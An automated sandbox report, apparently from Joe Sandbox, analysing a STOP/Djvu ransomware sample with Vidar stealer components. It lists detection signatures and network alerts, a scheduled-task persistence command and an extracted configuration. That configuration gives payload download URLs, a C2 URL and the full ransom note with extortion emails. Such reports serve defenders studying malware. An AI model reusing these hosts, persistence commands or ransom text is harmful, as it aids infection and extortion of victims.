10.2.mJVVW85CnW.exe.5e115a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.mJVVW85CnW.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.mJVVW85CnW.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.mJVVW85CnW.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 125 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mJVVW85CnW.exe, ProcessId: 6984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe" , ParentImage: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe, ParentProcessId: 416, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 2836, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Snort Signatures

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.4 - Destination IP: 190.218.33.18

Timestamp:	04/24/24-01:44:26.825977
SID:	2036333
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	04/24/24-01:44:30.698599
SID:	2036333
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	04/24/24-01:44:26.469774
SID:	2833438
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.4 - Destination IP: 58.151.148.90

Timestamp:	04/24/24-01:44:30.698599
SID:	2020826
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.4 - Destination IP: 190.218.33.18

Timestamp:	04/24/24-01:44:26.825977
SID:	2020826
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 58.151.148.90 - Destination IP: 192.168.2.4

Timestamp:	04/24/24-01:44:27.348899
SID:	2036335
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 58.151.148.90 - Destination IP: 192.168.2.4

Timestamp:	04/24/24-01:44:27.357056
SID:	2036335
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mJVVW85CnW.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://sdfjhuz.com/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exerun00	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Source: mJVVW85CnW.exe

ReversingLabs: Detection: 39%

Machine Learning detection for sample

Source: mJVVW85CnW.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,	1_2_00411178
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	1_2_0040EA51
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	1_2_0040EC68
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	4_2_0040E870
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	4_2_0040EAA0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	4_2_00410FC0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00411178 CryptDestroyHash,CryptReleaseContext,	4_2_00411178
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	4_2_0040EA51
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	4_2_0040EC68

Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000912000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_753f73db-f

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 1.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Unpacked PE file: 4.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 6.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 11.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Unpacked PE file: 24.2.mJVVW85CnW.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Source: mJVVW85CnW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.106.57.101:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49756 version: TLS 1.2

Source:	Binary string: nss3.pdb@ source: build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2162286898.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2168819502.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159491269.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2257701798.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258280957.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\* source: mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218471099.0000000009B86000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\; source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2179148661.0000000009B1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2320564181.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312031273.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\( source: mJVVW85CnW.exe, 00000004.00000003.2312373705.000000000345D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\v_Q source: mJVVW85CnW.exe, 00000004.00000003.2262644144.000000000317D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2327666459.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2320564181.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312031273.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Mi source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\on Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2318784196.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2336859719.0000000009C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003567000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a source: mJVVW85CnW.exe, 00000004.00000003.2289151612.0000000009B0F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B06000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256605004.0000000009AFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2305805567.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2293719417.0000000003502000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000002.2335766594.00000000033BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbTENT_TASKBARHEADLINES.json\ta\AxS source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159696700.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\0 source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2323904467.00000000033BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2179148661.0000000009B1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000000.1797035314.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000002.1801295260.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1799119196.0000000000410000.00000002.00000001.01000000.00000008.sdmp
